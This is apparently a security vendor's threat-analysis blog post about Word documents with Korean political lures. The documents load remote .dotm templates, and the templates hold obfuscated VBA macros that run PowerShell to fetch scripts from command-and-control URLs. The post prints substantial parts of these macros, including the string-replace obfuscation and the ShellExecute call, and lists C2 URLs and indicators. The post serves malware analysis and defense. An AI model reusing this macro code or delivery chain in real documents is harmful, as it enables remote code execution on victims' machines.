Malicious Word Documents Pretending ‘Korea Association for Political and Diplomatic History’ and ‘Policy Advisory Member Profile’ Being Distributed

As shown below, the ASEC analysis team introduced on two occasions that malicious word documents with titles ‘Compensation Claim Form’ and ‘Summer Academic Conference Profile Template’ were being distributed. While monitoring similar attack types, the team found evidence that the creator of the documents distributed new word documents in June and on July 1st.

Titles of newly discovered malicious word document

  • The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx – Additional discovery in June
  • [Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx – Additional discovery on July 1st

Blog posts about malicious words introduced as the same type

The name of the distributed file confirmed on July 1st is ‘[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx,’ which downloads a word document file including the external dotm macro through the external link in the document.

Figure 1. External URL within ‘[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx’

In the InterKoreanSummit.dotm file that has the macro code performing the actual malicious behaviors, the following obfuscated code exists. The macro is similar to the one introduced in the ASEC blog posted on June 14th, Malware Disguised as Normal Excel and Word Documents.

Attribute VB_Name = “ThisDocument”

 Attribute VB_Base = “0{00020906-0000-0000-C000-000000000046}”

 Attribute VB_GlobalNameSpace = False

 Attribute VB_Creatable = False

 Attribute VB_PredeclaredId = True

 Attribute VB_Exposed = True

 Attribute VB_TemplateDerived = False

 Attribute VB_Customizable = True

 Private Sub Document_Open()

 eifhhdfasfiedf

 aksjdkjaskf

 End Sub

 Function eifhhdfasfiedf()

 Set djfeihfidkasljf = CreateObject(“Shell.Application”)

 dfgdfjiejfjdshaj = “tlsiapowtlsiaertlsiastlsiahetlsialltlsia.etlsiatlsiaxtlsiae”

 fjdjkasf = “tlsiajdsladkf”

 fjdjkasf = Left(fjdjkasf, 5)

 dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, “”)

 hdfksallasjkdlaf = “$atlsiatlsiatlsia=’tlsiaC:tlsiatlsia\wtlsiatlsiaintlsiatlsiadotlsiatlsiawstlsiatlsia\ttlsiaetlsiamptlsia\DtlsiatlsiaMItlsia5tlsiaCtlsiaA0tlsia6.tlsiatlsiatmtlsiaptlsia’tlsiatlsia;tlsia”

 hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, “”)

… (omitted)

 aksfkjaskjfksnkf = “tlsiatlsia$tlsiactlsiatlsia;$tlsiadtlsia=[tlsiatlsiaIOtlsia.tlsiatlsiaFitlsiale]tlsiatlsia:tlsia:RtlsiatlsiaeatlsiadAtlsialtlsiatlsialTtlsiaetlsiaxttlsiatlsia($tlsiaatlsiatlsia)tlsia;tlsia$tlsiae=tlsiaietlsiatlsiax $tlsiad;tlsiaitlsiaetlsiax tlsia$tlsiae”

 aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, “”)

 skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf

 djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, “”, “open”, 0

 End Function

 Function aksjdkjaskf()

 Dim SngSec As Single

… (omitted)

 sakjfkalsjfkasjf = Replace(sakjfkalsjfkasjf, fjdjkasf, “”)

 djfkasjfskaal = Left(sakjfkalsjfkasjf, 32)

 djfkasjfskaal = Right(djfkasjfskaal, 28)

 If djfkasjfskaal = “” Then

 Else

 Kill djfkasjfskaal

 End If

 End Function

Code 1. Part of macro code within InterKoreanSummit.dotm file

Attribute VB_Name = “NewMacros”

 Sub djfksdalfjkasj()

     Selection.TypeText Text:=”a”

 End Sub

 Sub ejdksaljfkalkf()

     Selection.TypeText Text:=”b”

 End Sub

 Sub eijdklsafkasdk()

     Selection.TypeText Text:=”c”

 End Sub

 Sub uehfsahdkajkas()

     Selection.TypeText Text:=”d”

 End Sub

… (omitted)

Sub euehfhafjhdjkafqka()

     Selection.TypeText Text:=””     Application.Run MacroName:=”Project.NewMacros.euirieafkjekjf”     Application.Run MacroName:=”Project.NewMacros.qjiejwfksjalksainuse”     Application.Run MacroName:=”Project.NewMacros.euirieafkjekjf”     Selection.TypeText Text:=”

 End Sub

 Sub eijfkdjqjdfklafea()

    Selection.TypeText Text:=”+”

 End Sub

 Sub efuehjsahfklkejklafe()

    Selection.TypeText Text:=”{“

 End Sub

… (omitted)

Sub qeuejsahfdasight()

    Selection.MoveRight Unit:=wdCharacter, Count:=1

 End Sub

 Sub idifdsakjflakdsagedown()

    Selection.MoveDown Unit:=wdScreen, Count:=1

 End Sub

Code 2. Part of macro code within InterKoreanSummit.dotm file

When the macro is run, it connects to C2 (hxxp://ripzi.getenjoyment.net/le/eh.txt) to download an additional script and kills the C:\windows\temp\DMI5CA06.tmp file. The downloaded script has the same code as the one introduced in the post uploaded in June titled “Malware Disguised as Normal Excel and Word Documents,” with the only difference being the C2 URL.

Figure 2. Malicious script found in C2

Also, in June, it was found that the malicious file of the same format was distributed with the title ‘The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx.’ The external URL existing in the file is as follows.

Figure 3. External URL within ‘The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx’

Within the Seminarfinal.dotm file downloaded from the URL, there exists a macro that is similar to the one found in the InterKoreanSummit.dotm file explained above. The following is a part of the obfuscated macro code in Seminarfinal.dotm.

Private Sub Document_Open()

 eifhhdfasfiedf

 End Sub

 Function eifhhdfasfiedf()

 Set djfeihfidkasljf = CreateObject(“Shell.Application”)

 Dim dfgdfjiejfjdshaj As String

 Dim yhjhfjdhfdhfuesk(10) As String

 dfgdfjiejfjdshaj = “tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn”

 dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “tuwhn”, “”)

 yhjhfjdhfdhfuesk(0) = “tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn “

 dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “tuwhn”, “”)

… (omitted)

 dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(4), “tuwhn”, “”)

 yhjhfjdhfdhfuesk(5) = “etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn”

 dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), “tuwhn”, “”)

 djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0

 End Function

Code 3. Part of macro code within Seminarfinal.dotm file

The macro also connects to C2 (hxxp://likel.atwebpages.com/bu/ma.txt) to download an additional script. The script is the same as the one existing in hxxp://ripzi.getenjoyment.net/le/eh.txt explained earlier.

All of the collected files had Naeil_EnglishStart as the user name. As the name is identical to the author of the documents titled ‘[** Summer Academic Conference]_Profile Template.doc‘ and ‘Compensation Claim Form’, it is likely that the collected files were created by the same attacker.

Figure 4. Document property of ‘[** Summer Academic Conference]_Solar Calendar.doc’

As you can see, malware targeting particular users are being actively distributed recently. As most of them are assumed to be created by the same attacker, users need to take caution. Users must refrain from opening files and links attached to emails sent from unknown senders, as well as running macros.

AhnLab’s anti-malware product, V3, detects the targeted attack malicious word documents as shown below.

[File Detection]

  • Downloader/XML.External
  • Downloader/DOC.Generic

[IOC]

  • hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
  • hxxp://likel.atwebpages.com/officeDocument/2006/relationships/attachedTemplate/Seminarfinal.dotm
  • hxxp://ripzi.getenjoyment.net/le/eh.txt
  • hxxp://likel.atwebpages.com/bu/ma.txt

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 3 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments